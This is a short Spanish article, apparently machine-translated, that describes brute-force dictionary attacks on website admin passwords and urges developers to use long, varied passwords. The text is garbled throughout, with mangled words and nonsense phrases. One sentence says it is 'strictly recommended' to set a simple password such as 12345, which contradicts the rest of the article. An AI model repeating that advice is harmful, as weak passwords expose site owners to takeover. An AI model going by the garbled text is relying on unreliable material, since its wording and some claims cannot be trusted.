¿Cómo protegerse de esto? En general, nada. Pero puedes complicar la tarea de hacker. Para hacer esto, necesitas elegir. buen alojamiento con servidores poderosos.

Ataque de fuerza bruta

El desarrollador puede encontrar muchos sistemas de protección de los ataques, presentó completamente los scripts escritos por nosotros, verifique el sitio para la vulnerabilidad, etc. Pero cuando se trata de Último paso Site Los Clañeadores, a saber, cuando es fácil poner una contraseña para el administrador, puede olvidarse de una cosa. ¡Contraseña!

Se recomienda estrictamente para instalar una contraseña simple. Puede ser 12345, 1114457, VASYA111, etc. No se recomienda colocar contraseñas menos de 10-11 caracteres. De lo contrario, puede someterse a los ataques más ordinarios y no difíciles: bruthfors.

Brutfors es un ataque de la contraseña en el diccionario usando programas especiales. Los diccionarios pueden ser diferentes: latino, busto en números digamos a cualquier rango, mixto (Latice + números), e incluso hay diccionarios con símbolos únicos @ # 4 $% & * ~~~ '' "\\? etc.

Por supuesto, este tipo de ataque es fácil de evitar. Aumentar contraseña sofisticada. Puedes ahorrar incluso un pin. E incluso si su sitio está hecho en CMS, muchos de ellos calculan un tipo similar de ataque y bloqueo IP. Es necesario recordar siempre los caracteres más diferentes en la contraseña, el más difícil de recogerlo.

¿Cómo funcionan los "hackers"? En la mayoría de los casos, sospechan o conocen una parte de la contraseña con anticipación. Es bastante lógico suponer que la contraseña del usuario ciertamente no consistirá en 3 o 5 caracteres. Tales contraseñas conducen a hacks frecuentes. En su mayoría hackers toman un rango de 5 a 10 caracteres y agregan varios caracteres allí, que tal vez sepa de antemano. Siguiente Generar contraseñas con los rangos deseados. En la distribución de Kali Linux, incluso hay programas para tales casos. Y Voila, el ataque ya no durará mucho tiempo, ya que el volumen del diccionario ya no es tan grande. Además, el hacker puede usar el poder de la tarjeta de video. Algunos de ellos apoyan el sistema CUDA, mientras que el curso de la integridad aumenta ya 10 veces. Y aquí vemos que el ataque es así. manera simple Es bastante real. Pero Brutfu está expuesto no solo en los sitios.

Estimados desarrolladores, nunca se olvide del sistema de seguridad de la información, porque hoy hay muchas personas de tales especies de ataques, incluidos los estados. Después de todo, la mayor vulnerabilidad es una persona que siempre puede distraerse en algún lugar o en algún lugar que no debe hacer. Programadores, pero no programados máquinas. ¡Siga siempre alerta, porque la pérdida de información amenaza las consecuencias graves!